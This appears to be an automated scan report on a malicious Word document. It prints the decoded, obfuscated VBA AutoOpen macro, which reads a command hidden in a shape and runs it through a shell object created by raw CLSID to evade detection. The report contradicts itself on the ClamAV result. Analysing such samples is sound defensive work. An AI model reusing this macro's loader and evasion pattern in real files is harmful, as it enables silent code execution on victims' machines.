Verdict: MALICIOUS
Risk Score: 252
Heuristics: 9
- ClamAV: Doc.Downloader.Sagent-6770602-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sagent-6770602-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: akQqv = 15306327 + CByte(CclULnWc - Sqr(fBGjZuHK)) * Imvjais - nzncDZO * MLrJwnfwJ / CDate(230919810) * 82358692 * 33826345 / (296489503 - Sin(203554929)) Set tDCnZp = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script: akQqv = 15306327 + CByte(CclULnWc - Sqr(fBGjZuHK)) * Imvjais - nzncDZO * MLrJwnfwJ / CDate(230919810) * 82358692 * 33826345 / (296489503 - Sin(203554929)) Set tDCnZp = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8670 bytes |

SHA-256: 03c80322adc5ed0c9d05cce44b777ef98063d60644dd19364c28c04c98364b23

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 152 of 213 identifiers look randomly generated (e.g. 'iWjjBhRHTXRK'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "PkowIcjGjd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case UaspKDFv
Case 47065385
KWPAl = 298282062
XBrwJiQ = AqXPLtENN
XGRJAOiIY = 225925296
Case 85541435
ajiJl = ChrW(98964747)
iLrbwJ = CDate(87147712)
fvGFJCCN = 253676228
End Select
NAdTA = 70452598 + CByte(jtQolCIp - Sqr(imfiUAmjz)) * RcDFYV - wXOqOKhtP * wuutwQ / CDate(102085106) * 151707143 * 101141963 / (222688372 - Sin(50315826))
On Error Resume Next
Select Case FfhlbpvUI
Case 235911890
GiZIA = 45919840
LsAdM = KhorfZS
iwqOMpw = 280291147
Case 3453682
wzjBnJMz = ChrW(230586242)
rWrcTIbu = CDate(4557344)
ojRjb = 252025557
End Select
tnRHUsKh = 100517225 + CByte(ItffiqjfH - Sqr(NvEOD)) * wAMfzaBaS - RbWij * DQSAVYGth / CDate(6116981) * 126327619 * 221731624 / (143988171 - Sin(327908881))
On Error Resume Next
Select Case PlrwlmABF
Case 150422277
mufHUj = 297646447
PWjpRCIM = jhvvJKPuA
nVhXYvk = 165371959
Case 244970137
tTbvfZV = ChrW(230604607)
ZtdZKUXaR = CDate(192019897)
QMTMFRiz = 53707279
End Select
hdWiwNGAQ = 236066310 + CByte(jwbcKvXC - Sqr(USvBN)) * zPpNrVaC - QGrNGRaBt * jOsjvWKwG / CDate(163553499) * 99075433 * 219665962 / (142234830 - Sin(135283864))
On Error Resume Next
Select Case OpMGniWjb
Case 156209630
PVasoF = 234989890
ItZbJVF = wSJlJD
EXcbVEO = 171847052
Case 230825871
ifANvzV = ChrW(136038887)
swoNClhXZ = CDate(110542988)
lBLtWV = 83690406
End Select
OZuTqwa = 278633433 + CByte(wBVoR - Sqr(LfPJZq)) * hoJRqhUG - ZlqGYwdzP * ucZYvdU / CDate(272164653) * 342233639 * 90528137 / (41882491 - Sin(80265236))
Set rLDsTF = Shapes("iWjjBhRHTXRK")
On Error Resume Next
Select Case ufWKZ
Case 309286980
BHKOikiJ = 267518997
jHUYkKM = QdMQh
sRRfHIC = 306914546
Case 73815853
fSqpE = ChrW(28154312)
pvItb = CDate(214586761)
JUJFJRVk = 173322659
End Select
WQTDCjWl = 317768271 + CByte(tSTXAM - Sqr(XUZlQkk)) * mzwltku - LSokznPlI * RnrBlEz / CDate(264241919) * 326466901 * 105871627 / (8567289 - Sin(301486903))
On Error Resume Next
Select Case vlSFcT
Case 221536904
DJfSCj = 341215289
zHBZi = zzfEWjB
OwmnfszE = 310047223
Case 163517714
pwMwfchq = ChrW(316689909)
EQlhX = CDate(264239995)
ZYzBKS = 314249248
End Select
fOBHBtMc = 275418182 + CByte(bkAzbopF - Sqr(JjAGHEj)) * WbifiRP - OjjuQsnvs * DSZwILFqm / CDate(18275994) * 203898990 * 53921011 / (299567498 - Sin(15986985))
rTcjEKpCY = "" + miqRM + hPjZACf + HFLbfkF + mTwilNr + PXjLH + rLDsTF.TextFrame.TextRange.Text + pPtjtVI + NQTMn + ShMwsTk
On Error Resume Next
Select Case HkNHSzNFr
Case 109859747
ssKio = 70181634
DdpqotjSY = SQizqck
aWqVzPtW = 276139425
Case 82666416
zFtwv = ChrW(33506647)
IQvTazY = CDate(247281357)
ahLBPZzN = 264873743
End Select
hjZwS = 20994145 + CByte(RZWYSn - Sqr(MUTpGvqzL)) * SoiLmaI - KtXzjUdQ * iwPOI / CDate(302987070) * 121050640 * 267564997 / (310825458 - Sin(37306340))
On Error Resume Next
Select Case uwTzHowG
Case 74645740
SFzad = 267549258
jotJVFYi = GjShZIfvB
ZWXOpiko = 225312451
Case 233056162
UjpwEwrZ = ChrW(162683247)
uUQhPodiJ = CDate(174618900)
ZwOOL = 170857594
End Select
akQqv = 15306327 + CByte(CclULnWc - Sqr(fBGjZuHK)) * Imvjais - nzncDZO * MLrJwnfwJ / CDate(230919810) * 82358692 * 33826345 / (296489503 - Sin(203554929))
Set tDCnZp = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case sZQBMk
Case 158862562
aXcIpvQQ = 231297077
rowoGnE = mrMRLQhs
IwZoDMhj = 167798848
Case 119549965
pfpWDzHj = ChrW(112967697)
ScwXz = CDate(211913008)
JLLbzII = 129385421
End Select
oocPI = 219493163 + CByte(UAHCqNM - Sqr(AbjpU)) * RFjLWNG - rWjCt * SEBvlH / CDate(187433039) * 153185743 * 276203566 / (194635611 - Sin(207483968))
On Error Resume Next
Select Case YWorFpvV
Case 85240233
PaYqUL = 134744850
kwmJRJX = NIwYvP
LRVjOoaTq = 339589182
Case 192452526
KwjzQNa = ChrW(93187078)
zOEfT = CDate(302357269)
mWoSAbM = 164812703
End Select
iFnJdvJoj = 85875614 + CByte(jLiLUB - Sqr(OCQAuuwhU)) * KZikHw - HmEaBEQw * ivbod / CDate(327941650) * 334220028 * 216514260 / (324434850 - Sin(145942981))
On Error Resume Next
Select Case iTjLmni
Case 83176121
pLinzJ = 80414360
sFzusJuPz = OEHPjBDE
QjKPUpB = 76912563
Case 263530848
mNwjUK = ChrW(324245675)
iqKowpHQ = CDate(51442161)
afhjsm = 313666799
End Select
hpiEqz = 45400678 + CByte(KTRVn - Sqr(jOYOM)) * kVIEhpl - fCUKo * dIIaz / CDate(85600769) * 219394120 * 304944702 / (199952496 - Sin(262226020))
On Error Resume Next
Select Case ROFHsczMi
Case 321683068
PmhcTsYL = 30555891
cmlIj = NGmcf
TifKvnzR = 291112727
Case 30574567
OzQfKQR = ChrW(166911943)
NipcTwIVj = CDate(38175876)
UEiTwzJwk = 90475119
End Select
RXOXLTcD = 277153836 + CByte(ChXktCq - Sqr(fcimMDKSz)) * NHUpjaRR - wnpsjP * RWGiFuS / CDate(1452950) * 32394139 * 243456681 / (33541537 - Sin(207038570))
Const zWrhQA = 0
On Error Resume Next
Select Case OADITYYhH
Case 139072698
uhdzbiU = 246818640
OWnLq = hQBzzNQ
VwRcnfL = 87877551
Case 80589425
TmnaZhj = ChrW(61646342)
NcsNsS = CDate(325387825)
IfHXJiEIB = 65427972
End Select
jGwBK = 79439219 + CByte(DiHqUSnsC - Sqr(dkZKq)) * DiEDJIjS - XbcNPbh * BOOjR / CDate(73252112) * 266973689 * 236816555 / (111658236 - Sin(182628004))
tDCnZp.Run@ rTcjEKpCY, zWrhQA
On Error Resume Next
Select Case GsNKU
Case 188607820
RaSZHbcC = 232504936
ODiAt = wRNoiKwPs
HvJKiukN = 333418736
Case 208186535
JNqnCiBM = ChrW(322928149)
DMsQsG = CDate(261652226)
HbDjY = 132300396
End Select
sYiTSUCO = 93490668 + CByte(DXBbfwDv - Sqr(DiQtln)) * FrDicpWFJ - XsiuB * idpjmjciz / CDate(247409612) * 30278393 * 109289365 / (337393465 - Sin(185030380))
On Error Resume Next
Select Case OqBXWbCFs
Case 90690385
JWwfzvK = 126932774
FwOtzpQ = PulqPb
HDKiEmGs = 252614991
Case 309895013
DNnfAal = ChrW(283696788)
ScHajLsq = CDate(328318071)
kuuOXtl = 207597298
End Select
kwEbwV = 254195055 + CByte(WjtLE - Sqr(oSfwkws)) * QuJKhIwPm - uWGoNA * EtJVH / CDate(28242843) * 113065894 * 205237496 / (144782125 - Sin(42845652))
On Error Resume Next
Select Case wOzYloijh
Case 77154702
PLIwpooPU = 7986401
IKZiSR = qFcMKn
SvGrB = 23151630
Case 176826162
hWkMLnE = ChrW(202398223)
utoGn = CDate(337153126)
WMRqG = 151113981
End Select
AUoWt = 222406710 + CByte(TzjjcCw - Sqr(GfmaY)) * RzCfvD - omkVKUj * XQKwjbvEZ / CDate(71326420) * 320643247 * 34124043 / (106900415 - Sin(41793660))
On Error Resume Next
Select Case OPpPwbK
Case 283673441
lwTdwokwv = 340203408
vLvnw = WUJLTvW
qqrKh = 236219348
Case 329270463
uCCzwlBi = ChrW(31186027)
oMjDU = CDate(17764338)
aFqhkR = 6483484
End Select
YFwsnOPKH = 113561624 + CByte(kzZlTfHKH - Sqr(WnVpr)) * iHGJl - BYjDl * vYCblc / CDate(117311871) * 146812707 * 9278315 / (127861361 - Sin(153093612))
End Sub